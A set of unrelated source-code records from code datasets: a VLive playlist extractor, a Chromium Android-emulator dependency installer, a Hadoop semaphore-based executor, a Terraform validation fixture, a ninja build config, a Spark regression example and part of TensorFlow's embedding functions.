_VALID_URL = r'https?://(?:(?:www|m)\.)?vlive\.tv/video/(?P<video_id>[0-9]+)/playlist/(?P<id>[0-9]+)'
_TEST = {
'url': 'http://www.vlive.tv/video/22867/playlist/22912',
'info_dict': {
'id': '22912',
'title': 'Valentine Day Message from TWICE'
},
'playlist_mincount': 9
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id, playlist_id = mobj.group('video_id', 'id')
VIDEO_URL_TEMPLATE = 'http://www.vlive.tv/video/%s'
if self._downloader.params.get('noplaylist'):
self.to_screen(
'Downloading just video %s because of --no-playlist' % video_id)
return self.url_result(
VIDEO_URL_TEMPLATE % video_id,
ie=VLiveIE.ie_key(), video_id=video_id)
self.to_screen(
'Downloading playlist %s - add --no-playlist to just download video'
% playlist_id)
webpage = self._download_webpage(
'http://www.vlive.tv/video/%s/playlist/%s'
% (video_id, playlist_id), playlist_id)
item_ids = self._parse_json(
self._search_regex(
r'playlistVideoSeqs\s*=\s*(\[[^]]+\])', webpage,
'playlist video seqs'),
playlist_id)
entries = [
self.url_result(
VIDEO_URL_TEMPLATE % item_id, ie=VLiveIE.ie_key(),
video_id=compat_str(item_id))
for item_id in item_ids]
playlist_name = self._html_search_regex(
r'<div[^>]+class="[^"]*multicam_playlist[^>]*>\s*<h3[^>]+>([^<]+)',
webpage, 'playlist title', fatal=False)
return self.playlist_result(entries, playlist_id, playlist_name)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Installs deps for using SDK emulator for testing.
The script will download the SDK and system images, if they are not present, and
install and enable KVM, if virtualization has been enabled in the BIOS.
"""
import logging
import optparse
import os
import re
import shutil
import sys
from pylib import cmd_helper
from pylib import constants
from pylib import pexpect
from pylib.utils import run_tests_helper
# Android API level
DEFAULT_ANDROID_API_LEVEL = constants.ANDROID_SDK_VERSION
# From the Android Developer's website.
# Keep this up to date; the user can install older API levels as necessary.
SDK_BASE_URL = 'http://dl.google.com/android/adt'
SDK_ZIP = 'adt-bundle-linux-x86_64-20131030.zip'
# pylint: disable=C0301
# Android x86 system image from the Intel website:
# http://software.intel.com/en-us/articles/intel-eula-x86-android-4-2-jelly-bean-bin
# These don't exist prior to Android-15.
# As of 08 Nov 2013, Android-19 is not yet available either.
X86_IMG_URLS = {
15: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-15_r01.zip',
16: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-16_r01.zip',
17: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-17_r01.zip',
18: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-18_r01.zip',
19: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-19_r01.zip'}
#pylint: enable=C0301
def CheckSDK():
"""Check if SDK is already installed.
Returns:
True if the emulator SDK directory (src/android_emulator_sdk/) exists.
"""
return os.path.exists(constants.EMULATOR_SDK_ROOT)
def CheckSDKPlatform(api_level=DEFAULT_ANDROID_API_LEVEL):
"""Check if the "SDK Platform" for the specified API level is installed.
This is necessary in order for the emulator to run when the target
is specified.
Args:
api_level: the Android API level to check; defaults to the latest API.
Returns:
True if the platform is already installed.
"""
android_binary = os.path.join(constants.EMULATOR_SDK_ROOT,
'sdk', 'tools', 'android')
pattern = re.compile('id: [0-9]+ or "android-%d"' % api_level)
try:
exit_code, stdout = cmd_helper.GetCmdStatusAndOutput(
[android_binary, 'list'])
if exit_code != 0:
raise Exception('\'android list\' command failed')
for line in stdout.split('\n'):
if pattern.match(line):
return True
return False
except OSError:
logging.exception('Unable to execute \'android list\'')
return False
def CheckX86Image(api_level=DEFAULT_ANDROID_API_LEVEL):
"""Check if Android system images have been installed.
Args:
api_level: the Android API level to check for; defaults to the latest API.
Returns:
True if sdk/system-images/android-<api_level>/x86 exists inside
EMULATOR_SDK_ROOT.
"""
api_target = 'android-%d' % api_level
return os.path.exists(os.path.join(constants.EMULATOR_SDK_ROOT,
'sdk', 'system-images',
api_target, 'x86'))
def CheckKVM():
"""Quickly check whether KVM is enabled.
Returns:
True iff /dev/kvm exists (Linux only).
"""
return os.path.exists('/dev/kvm')
def RunKvmOk():
"""Run kvm-ok as root to check that KVM is properly enabled after installation
of the required packages.
Returns:
True iff KVM is enabled (/dev/kvm exists). On failure, returns False
but also print detailed information explaining why KVM isn't enabled
(e.g. CPU doesn't support it, or BIOS disabled it).
"""
try:
# Note: kvm-ok is in /usr/sbin, so always use 'sudo' to run it.
return not cmd_helper.RunCmd(['sudo', 'kvm-ok'])
except OSError:
logging.info('kvm-ok not installed')
return False
def GetSDK():
"""Download the SDK and unzip it into EMULATOR_SDK_ROOT."""
logging.info('Download Android SDK.')
sdk_url = '%s/%s' % (SDK_BASE_URL, SDK_ZIP)
try:
cmd_helper.RunCmd(['curl', '-o', '/tmp/sdk.zip', sdk_url])
print 'curled unzipping...'
rc = cmd_helper.RunCmd(['unzip', '-o', '/tmp/sdk.zip', '-d', '/tmp/'])
if rc:
raise Exception('ERROR: could not download/unzip Android SDK.')
# Get the name of the sub-directory that everything will be extracted to.
dirname, _ = os.path.splitext(SDK_ZIP)
zip_dir = '/tmp/%s' % dirname
# Move the extracted directory to EMULATOR_SDK_ROOT
shutil.move(zip_dir, constants.EMULATOR_SDK_ROOT)
finally:
os.unlink('/tmp/sdk.zip')
def InstallKVM():
"""Installs KVM packages."""
rc = cmd_helper.RunCmd(['sudo', 'apt-get', 'install', 'kvm'])
if rc:
logging.critical('ERROR: Did not install KVM. Make sure hardware '
'virtualization is enabled in BIOS (i.e. Intel VT-x or '
'AMD SVM).')
# TODO(navabi): Use modprobe kvm-amd on AMD processors.
rc = cmd_helper.RunCmd(['sudo', 'modprobe', 'kvm-intel'])
if rc:
logging.critical('ERROR: Did not add KVM module to Linux Kernel. Make sure '
'hardware virtualization is enabled in BIOS.')
# Now check to ensure KVM acceleration can be used.
if not RunKvmOk():
logging.critical('ERROR: Can not use KVM acceleration. Make sure hardware '
'virtualization is enabled in BIOS (i.e. Intel VT-x or '
'AMD SVM).')
def GetX86Image(api_level=DEFAULT_ANDROID_API_LEVEL):
"""Download x86 system image from Intel's website.
Args:
api_level: the Android API level to download for.
"""
logging.info('Download x86 system image directory into sdk directory.')
# TODO(andrewhayden): Use python tempfile lib instead
temp_file = '/tmp/x86_img_android-%d.zip' % api_level
if api_level not in X86_IMG_URLS:
raise Exception('ERROR: no URL known for x86 image for android-%s' %
api_level)
try:
cmd_helper.RunCmd(['curl', '-o', temp_file, X86_IMG_URLS[api_level]])
rc = cmd_helper.RunCmd(['unzip', '-o', temp_file, '-d', '/tmp/'])
if rc:
raise Exception('ERROR: Could not download/unzip image zip.')
api_target = 'android-%d' % api_level
sys_imgs = os.path.join(constants.EMULATOR_SDK_ROOT, 'sdk',
'system-images', api_target, 'x86')
logging.info('Deploying system image to %s' % sys_imgs)
shutil.move('/tmp/x86', sys_imgs)
finally:
os.unlink(temp_file)
def GetSDKPlatform(api_level=DEFAULT_ANDROID_API_LEVEL):
"""Update the SDK to include the platform specified.
Args:
api_level: the Android API level to download
"""
android_binary = os.path.join(constants.EMULATOR_SDK_ROOT,
'sdk', 'tools', 'android')
pattern = re.compile('\s*([0-9]+)- SDK Platform Android [\.,0-9]+, API %d.*' %
api_level)
# Example:
# 2- SDK Platform Android 4.3, API 18, revision 2
exit_code, stdout = cmd_helper.GetCmdStatusAndOutput(
[android_binary, 'list', 'sdk'])
if exit_code != 0:
raise Exception('\'android list sdk\' command return %d' % exit_code)
for line in stdout.split('\n'):
match = pattern.match(line)
if match:
index = match.group(1)
print('package %s corresponds to platform level %d' % (index, api_level))
# update sdk --no-ui --filter $INDEX
update_command = [android_binary,
'update', 'sdk', '--no-ui', '--filter', index]
update_command_str = ' '.join(update_command)
logging.info('running update command: %s' % update_command_str)
update_process = pexpect.spawn(update_command_str)
# TODO(andrewhayden): Do we need to bug the user about this?
if update_process.expect('Do you accept the license') != 0:
raise Exception('License agreement check failed')
update_process.sendline('y')
if update_process.expect('Done. 1 package installed.') == 0:
print('Successfully installed platform for API level %d' % api_level)
return
else:
raise Exception('Failed to install platform update')
raise Exception('Could not find android-%d update for the SDK!' % api_level)
def main(argv):
opt_parser = optparse.OptionParser(
description='Install dependencies for running the Android emulator')
opt_parser.add_option('--api-level', dest='api_level',
help='The API level (e.g., 19 for Android 4.4) to ensure is available',
type='int', default=DEFAULT_ANDROID_API_LEVEL)
opt_parser.add_option('-v', dest='verbose', action='store_true',
help='enable verbose logging')
options, _ = opt_parser.parse_args(argv[1:])
# run_tests_helper will set logging to INFO or DEBUG
# We achieve verbose output by configuring it with 2 (==DEBUG)
verbosity = 1
if (options.verbose):
verbosity = 2
logging.basicConfig(level=logging.INFO,
format='# %(asctime)-15s: %(message)s')
run_tests_helper.SetLogLevel(verbose_count=verbosity)
# Calls below will download emulator SDK and/or system images only if needed.
if CheckSDK():
logging.info('android_emulator_sdk/ already exists, skipping download.')
else:
GetSDK()
# Check target. The target has to be installed in order to run the emulator.
if CheckSDKPlatform(options.api_level):
logging.info('SDK platform android-%d already present, skipping.' %
options.api_level)
else:
logging.info('SDK platform android-%d not present, installing.' %
options.api_level)
GetSDKPlatform(options.api_level)
# Download the x86 system image only if needed.
if CheckX86Image(options.api_level):
logging.info('x86 image for android-%d already present, skipping.' %
options.api_level)
else:
GetX86Image(options.api_level)
# Make sure KVM packages are installed and enabled.
if CheckKVM():
logging.info('KVM already installed and enabled.')
else:
InstallKVM()
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.util;
import org.apache.hadoop.thirdparty.com.google.common.util.concurrent.ForwardingExecutorService;
import org.apache.hadoop.thirdparty.com.google.common.util.concurrent.Futures;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.fs.statistics.DurationTracker;
import org.apache.hadoop.fs.statistics.DurationTrackerFactory;
import java.util.Collection;
import java.util.List;
import java.util.concurrent.Callable;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Future;
import java.util.concurrent.Semaphore;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import static java.util.Objects.requireNonNull;
import static org.apache.hadoop.fs.statistics.IOStatisticsSupport.stubDurationTrackerFactory;
import static org.apache.hadoop.fs.statistics.StoreStatisticNames.ACTION_EXECUTOR_ACQUIRED;
/**
* This ExecutorService blocks the submission of new tasks when its queue is
* already full by using a semaphore. Task submissions require permits, task
* completions release permits.
* <p>
* This is a refactoring of {@link BlockingThreadPoolExecutorService}; that code
* contains the thread pool logic, whereas this isolates the semaphore
* and submit logic for use with other thread pools and delegation models.
* <p>
* This is inspired by <a href="https://github.com/apache/incubator-s4/blob/master/subprojects/s4-comm/src/main/java/org/apache/s4/comm/staging/BlockingThreadPoolExecutorService.java">
* this s4 threadpool</a>
*/
@SuppressWarnings("NullableProblems")
@InterfaceAudience.Private
public class SemaphoredDelegatingExecutor extends
ForwardingExecutorService {
private final Semaphore queueingPermits;
private final ExecutorService executorDelegatee;
private final int permitCount;
private final DurationTrackerFactory trackerFactory;
/**
* Instantiate.
* @param executorDelegatee Executor to delegate to
* @param permitCount number of permits into the queue permitted
* @param fair should the semaphore be "fair"
* @param trackerFactory duration tracker factory.
*/
public SemaphoredDelegatingExecutor(
ExecutorService executorDelegatee,
int permitCount,
boolean fair,
DurationTrackerFactory trackerFactory) {
this.permitCount = permitCount;
queueingPermits = new Semaphore(permitCount, fair);
this.executorDelegatee = requireNonNull(executorDelegatee);
this.trackerFactory = trackerFactory != null
? trackerFactory
: stubDurationTrackerFactory();
}
/**
* Instantiate without collecting executor aquisition duration information.
* @param executorDelegatee Executor to delegate to
* @param permitCount number of permits into the queue permitted
* @param fair should the semaphore be "fair"
*/
public SemaphoredDelegatingExecutor(
ExecutorService executorDelegatee,
int permitCount,
boolean fair) {
this(executorDelegatee, permitCount, fair, null);
}
@Override
protected ExecutorService delegate() {
return executorDelegatee;
}
@Override
public <T> List<Future<T>> invokeAll(Collection<? extends Callable<T>> tasks)
throws InterruptedException {
throw new RuntimeException("Not implemented");
}
@Override
public <T> List<Future<T>> invokeAll(Collection<? extends Callable<T>> tasks,
long timeout, TimeUnit unit) throws InterruptedException {
throw new RuntimeException("Not implemented");
}
@Override
public <T> T invokeAny(Collection<? extends Callable<T>> tasks)
throws InterruptedException, ExecutionException {
throw new RuntimeException("Not implemented");
}
@Override
public <T> T invokeAny(Collection<? extends Callable<T>> tasks, long timeout,
TimeUnit unit)
throws InterruptedException, ExecutionException, TimeoutException {
throw new RuntimeException("Not implemented");
}
@Override
public <T> Future<T> submit(Callable<T> task) {
try (DurationTracker ignored =
trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
queueingPermits.acquire();
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
return Futures.immediateFailedFuture(e);
}
return super.submit(new CallableWithPermitRelease<>(task));
}
@Override
public <T> Future<T> submit(Runnable task, T result) {
try (DurationTracker ignored =
trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
queueingPermits.acquire();
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
return Futures.immediateFailedFuture(e);
}
return super.submit(new RunnableWithPermitRelease(task), result);
}
@Override
public Future<?> submit(Runnable task) {
try (DurationTracker ignored =
trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
queueingPermits.acquire();
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
return Futures.immediateFailedFuture(e);
}
return super.submit(new RunnableWithPermitRelease(task));
}
@Override
public void execute(Runnable command) {
try (DurationTracker ignored =
trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
queueingPermits.acquire();
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
super.execute(new RunnableWithPermitRelease(command));
}
/**
* Get the number of permits available; guaranteed to be
* {@code 0 <= availablePermits <= size}.
* @return the number of permits available at the time of invocation.
*/
public int getAvailablePermits() {
return queueingPermits.availablePermits();
}
/**
* Get the number of threads waiting to acquire a permit.
* @return snapshot of the length of the queue of blocked threads.
*/
public int getWaitingCount() {
return queueingPermits.getQueueLength();
}
/**
* Total number of permits.
* @return the number of permits as set in the constructor
*/
public int getPermitCount() {
return permitCount;
}
@Override
public String toString() {
final StringBuilder sb = new StringBuilder(
"SemaphoredDelegatingExecutor{");
sb.append("permitCount=").append(getPermitCount())
.append(", available=").append(getAvailablePermits())
.append(", waiting=").append(getWaitingCount())
.append('}');
return sb.toString();
}
/**
* Releases a permit after the task is executed.
*/
class RunnableWithPermitRelease implements Runnable {
private Runnable delegatee;
RunnableWithPermitRelease(Runnable delegatee) {
this.delegatee = delegatee;
}
@Override
public void run() {
try {
delegatee.run();
} finally {
queueingPermits.release();
}
}
}
/**
* Releases a permit after the task is completed.
*/
class CallableWithPermitRelease<T> implements Callable<T> {
private Callable<T> delegatee;
CallableWithPermitRelease(Callable<T> delegatee) {
this.delegatee = delegatee;
}
@Override
public T call() throws Exception {
try {
return delegatee.call();
} finally {
queueingPermits.release();
}
}
}
}
|
java
|
github
|
https://github.com/apache/hadoop
|
hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/util/SemaphoredDelegatingExecutor.java
|
{
"format_version": "1.0",
"valid": false,
"error_count": 4,
"warning_count": 0,
"diagnostics": [
{
"severity": "error",
"summary": "Missing required argument",
"detail": "The argument \"source\" is required, but no definition was found.",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 1,
"column": 23,
"byte": 22
},
"end": {
"line": 1,
"column": 24,
"byte": 23
}
},
"snippet": {
"context": "module \"super#module\"",
"code": "module \"super#module\" {",
"start_line": 1,
"highlight_start_offset": 22,
"highlight_end_offset": 23,
"values": []
}
},
{
"severity": "error",
"summary": "Invalid module instance name",
"detail": "A name must start with a letter or underscore and may contain only letters, digits, underscores, and dashes.",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 1,
"column": 8,
"byte": 7
},
"end": {
"line": 1,
"column": 22,
"byte": 21
}
},
"snippet": {
"context": "module \"super#module\"",
"code": "module \"super#module\" {",
"start_line": 1,
"highlight_start_offset": 7,
"highlight_end_offset": 21,
"values": []
}
},
{
"severity": "error",
"summary": "Variables not allowed",
"detail": "Variables may not be used here.",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 5,
"column": 12,
"byte": 55
},
"end": {
"line": 5,
"column": 15,
"byte": 58
}
},
"snippet": {
"context": "module \"super\"",
"code": " source = var.modulename",
"start_line": 5,
"highlight_start_offset": 11,
"highlight_end_offset": 14,
"values": []
}
},
{
"severity": "error",
"summary": "Unsuitable value type",
"detail": "Unsuitable value: value must be known",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 5,
"column": 12,
"byte": 55
},
"end": {
"line": 5,
"column": 26,
"byte": 69
}
},
"snippet": {
"context": "module \"super\"",
"code": " source = var.modulename",
"start_line": 5,
"highlight_start_offset": 11,
"highlight_end_offset": 25,
"values": []
}
}
]
}
|
json
|
github
|
https://github.com/hashicorp/terraform
|
internal/command/testdata/validate-invalid/incorrectmodulename/output.json
|
exe = "tester"
# "gnu" or "clang"
toolchain = "gnu"
# optional
link_pool_depth = 1
# optional
builddir = {
"gnu" : "build"
, "msvc" : "build"
, "clang" : "build"
}
includes = {
"gnu" : [ "-I." ]
, "msvc" : [ "/I." ]
, "clang" : [ "-I." ]
}
defines = {
"gnu" : [ ]
, "msvc" : [ ]
, "clang" : [ ]
}
cflags = {
"gnu" : [ "-O2", "-g" ]
, "msvc" : [ "/O2" ]
, "clang" : [ "-O2", "-g" ]
}
# Warn as much as possible: http://qiita.com/MitsutakaTakeda/items/6b9966f890cc9b944d75
cxxflags = {
"gnu" : [ "-O2", "-g", "-pedantic -Wall -Wextra -Wcast-align -Wcast-qual -Wctor-dtor-privacy -Wdisabled-optimization -Wformat=2 -Winit-self -Wmissing-declarations -Wmissing-include-dirs -Wold-style-cast -Woverloaded-virtual -Wredundant-decls -Wshadow -Wsign-conversion -Wsign-promo -Wstrict-overflow=5 -Wswitch-default -Wundef -Werror -Wno-unused", "-fsanitize=address" ]
, "msvc" : [ "/O2", "/W4" ]
, "clang" : [ "-O2", "-g", "-Werror -Weverything -Wno-c++98-compat -Wno-c++98-compat-pedantic", "-fsanitize=address" ]
}
ldflags = {
"gnu" : [ "-fsanitize=address" ]
, "msvc" : [ ]
, "clang" : [ "-fsanitize=address" ]
}
cxx_files = [ "tester.cc" ]
c_files = [ ]
# You can register your own toolchain through register_toolchain function
def register_toolchain(ninja):
pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
An example demonstrating aft survival regression.
Run with:
bin/spark-submit examples/src/main/python/ml/aft_survival_regression.py
"""
from __future__ import print_function
# $example on$
from pyspark.ml.regression import AFTSurvivalRegression
from pyspark.ml.linalg import Vectors
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("AFTSurvivalRegressionExample") \
.getOrCreate()
# $example on$
training = spark.createDataFrame([
(1.218, 1.0, Vectors.dense(1.560, -0.605)),
(2.949, 0.0, Vectors.dense(0.346, 2.158)),
(3.627, 0.0, Vectors.dense(1.380, 0.231)),
(0.273, 1.0, Vectors.dense(0.520, 1.151)),
(4.199, 0.0, Vectors.dense(0.795, -0.226))], ["label", "censor", "features"])
quantileProbabilities = [0.3, 0.6]
aft = AFTSurvivalRegression(quantileProbabilities=quantileProbabilities,
quantilesCol="quantiles")
model = aft.fit(training)
# Print the coefficients, intercept and scale parameter for AFT survival regression
print("Coefficients: " + str(model.coefficients))
print("Intercept: " + str(model.intercept))
print("Scale: " + str(model.scale))
model.transform(training).show(truncate=False)
# $example off$
spark.stop()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Embedding functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.framework.python.framework import tensor_util as contrib_tensor_util
from tensorflow.contrib.layers.python.ops import sparse_feature_cross_op
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
__all__ = [
"safe_embedding_lookup_sparse", "scattered_embedding_lookup",
"scattered_embedding_lookup_sparse", "embedding_lookup_unique",
"embedding_lookup_sparse_with_distributed_aggregation"
]
def safe_embedding_lookup_sparse(embedding_weights,
sparse_ids,
sparse_weights=None,
combiner=None,
default_id=None,
name=None,
partition_strategy="div",
max_norm=None):
"""Lookup embedding results, accounting for invalid IDs and empty features.
The partitioned embedding in `embedding_weights` must all be the same shape
except for the first dimension. The first dimension is allowed to vary as the
vocabulary size is not necessarily a multiple of `P`. `embedding_weights`
may be a `PartitionedVariable` as returned by using `tf.get_variable()` with a
partitioner.
Invalid IDs (< 0) are pruned from input IDs and weights, as well as any IDs
with non-positive weight. For an entry with no features, the embedding vector
for `default_id` is returned, or the 0-vector if `default_id` is not supplied.
The ids and weights may be multi-dimensional. Embeddings are always aggregated
along the last dimension.
Args:
embedding_weights: A list of `P` float tensors or values representing
partitioned embedding tensors. Alternatively, a `PartitionedVariable`,
created by partitioning along dimension 0. The total unpartitioned
shape should be `[e_0, e_1, ..., e_m]`, where `e_0` represents the
vocab size and `e_1, ..., e_m` are the embedding dimensions.
sparse_ids: `SparseTensor` of shape `[d_0, d_1, ..., d_n]` containing the
ids. `d_0` is typically batch size.
sparse_weights: `SparseTensor` of same shape as `sparse_ids`, containing
float weights corresponding to `sparse_ids`, or `None` if all weights
are be assumed to be 1.0.
combiner: A string specifying how to combine embedding results for each
entry. Currently "mean", "sqrtn" and "sum" are supported, with "mean"
the default.
default_id: The id to use for an entry with no features.
name: A name for this operation (optional).
partition_strategy: A string specifying the partitioning strategy.
Currently `"div"` and `"mod"` are supported. Default is `"div"`.
max_norm: If not None, all embeddings are l2-normalized to max_norm before
combining.
Returns:
Dense tensor of shape `[d_0, d_1, ..., d_{n-1}, e_1, ..., e_m]`.
Raises:
ValueError: if `embedding_weights` is empty.
"""
if combiner is None:
logging.warn("The default value of combiner will change from \"mean\" "
"to \"sqrtn\" after 2016/11/01.")
combiner = "mean"
if embedding_weights is None:
raise ValueError("Missing embedding_weights %s." % embedding_weights)
if isinstance(embedding_weights, variables.PartitionedVariable):
embedding_weights = list(embedding_weights) # get underlying Variables.
if not isinstance(embedding_weights, list):
embedding_weights = [embedding_weights]
if len(embedding_weights) < 1:
raise ValueError("Missing embedding_weights %s." % embedding_weights)
dtype = sparse_weights.dtype if sparse_weights is not None else None
if isinstance(embedding_weights, variables.PartitionedVariable):
embedding_weights = list(embedding_weights)
embedding_weights = [
ops.convert_to_tensor(w, dtype=dtype) for w in embedding_weights
]
contrib_tensor_util.assert_same_float_dtype(embedding_weights +
[sparse_weights])
with ops.name_scope(name, "embedding_lookup",
embedding_weights + [sparse_ids,
sparse_weights]) as scope:
# Reshape higher-rank sparse ids and weights to linear segment ids.
original_shape = sparse_ids.dense_shape
original_rank_dim = sparse_ids.dense_shape.get_shape()[0]
original_rank = (
array_ops.size(original_shape)
if original_rank_dim.value is None
else original_rank_dim.value)
sparse_ids = sparse_ops.sparse_reshape(sparse_ids, [
math_ops.reduce_prod(
array_ops.slice(original_shape, [0], [original_rank - 1])),
array_ops.gather(original_shape, original_rank - 1)])
if sparse_weights is not None:
sparse_weights = sparse_tensor.SparseTensor(
sparse_ids.indices,
sparse_weights.values, sparse_ids.dense_shape)
# Prune invalid ids and weights.
sparse_ids, sparse_weights = _prune_invalid_ids(sparse_ids, sparse_weights)
# Fill in dummy values for empty features, if necessary.
sparse_ids, is_row_empty = sparse_ops.sparse_fill_empty_rows(sparse_ids,
default_id or
0)
if sparse_weights is not None:
sparse_weights, _ = sparse_ops.sparse_fill_empty_rows(sparse_weights, 1.0)
result = embedding_ops.embedding_lookup_sparse(
embedding_weights,
sparse_ids,
sparse_weights,
combiner=combiner,
partition_strategy=partition_strategy,
name=None if default_id is None else scope,
max_norm=max_norm)
if default_id is None:
# Broadcast is_row_empty to the same shape as embedding_lookup_result,
# for use in Select.
is_row_empty = array_ops.tile(
array_ops.reshape(is_row_empty, [-1, 1]),
array_ops.stack([1, array_ops.shape(result)[1]]))
result = array_ops.where(is_row_empty,
array_ops.zeros_like(result),
result,
name=scope)
# Reshape back from linear ids back into higher-dimensional dense result.
final_result = array_ops.reshape(
result,
array_ops.concat([
array_ops.slice(
math_ops.cast(original_shape, dtypes.int32), [0],
[original_rank - 1]),
array_ops.slice(array_ops.shape(result), [1], [-1])
], 0))
final_result.set_shape(tensor_shape.unknown_shape(
(original_rank_dim - 1).value).concatenate(result.get_shape()[1:]))
return final_result
def _prune_invalid_ids(sparse_ids, sparse_weights):
"""Prune invalid IDs (< 0) from the input ids and weights."""
is_id_valid = math_ops.greater_equal(sparse_ids.values, 0)
if sparse_weights is not None:
is_id_valid = math_ops.logical_and(
is_id_valid, math_ops.greater(sparse_weights.values, 0))
sparse_ids = sparse_ops.sparse_retain(sparse_ids, is_id_valid)
if sparse_weights is not None:
sparse_weights = sparse_ops.sparse_retain(sparse_weights, is_id_valid)
return sparse_ids, sparse_weights
def scattered_embedding_lookup(params,
values,
dimension,
name=None,
hash_key=None):
"""Looks up embeddings using parameter hashing for each value in `values`.
The i-th embedding component of a value v in `values` is found by retrieving
the weight whose index is a fingerprint of the pair (v,i).
The concept is explored as "feature hashing" for model compression in this
paper: http://arxiv.org/pdf/1504.04788.pdf
Feature hashing has the pleasant effect of allowing us to compute an embedding
without needing a pre-determined vocabulary, relieving some amount of process
complexity. It also allows for us to maintain embeddings for possibly
trillions of features with a fixed amount of memory.
Note that this is superior to out-of-vocabulary shared "hash buckets" in that
the embedding is extremely likely to be unique for each token as opposed to
being shared across probably-colliding tokens. The price is that we must
compute a hash once for each scalar in the token's embedding as opposed to
once per token.
If `params` is a list, it represents a partition of the embedding parameters.
Each tensor in the list should have the same length, except for the first ones
which may have an additional element. For instance 10 parameters can be
partitioned in 4 tensors with length `[3, 3, 2, 2]`.
Args:
params: A `Tensor`, `list` of `Tensors`, or `PartitionedVariable`.
Each tensor must be of rank 1 with fully-defined shape.
values: `Tensor` of values to be embedded with shape `[d0, ..., dn]`.
dimension: Embedding dimension.
name: An optional name for this op.
hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
function to combine the crosses fingerprints on SparseFeatureCrossOp
(optional).
Returns:
A `Tensor` with shape `[d0, ..., dn, dimension]`.
Raises:
ValueError: if dimension is not positive or the partition size is invalid.
"""
if dimension is None:
raise ValueError("You must specify dimension.")
return _sampled_scattered_embedding_lookup(
params, values, dimension=dimension, sampled_candidates=None,
hash_key=hash_key, name=name)
def _sampled_scattered_embedding_lookup(
params, values, dimension=None, sampled_candidates=None, hash_key=None,
name=None):
"""Looks up embeddings using parameter hashing for each value in `values`.
This method looks up selected embedding dimensions if `sampled_candidates` is
given, otherwise looks up all dimensions.
The i-th embedding component of a value v in `values` is found by retrieving
the weight whose index is a fingerprint of the pair (v,i).
The concept is explored as "feature hashing" for model compression in this
paper: http://arxiv.org/pdf/1504.04788.pdf
Feature hashing has the pleasant effect of allowing us to compute an embedding
without needing a pre-determined vocabulary, relieving some amount of process
complexity. It also allows for us to maintain embeddings for possibly
trillions of features with a fixed amount of memory.
Note that this is superior to out-of-vocabulary shared "hash buckets" in that
the embedding is extremely likely to be unique for each token as opposed to
being shared across probably-colliding tokens. The price is that we must
compute a hash once for each scalar in the token's embedding as opposed to
once per token.
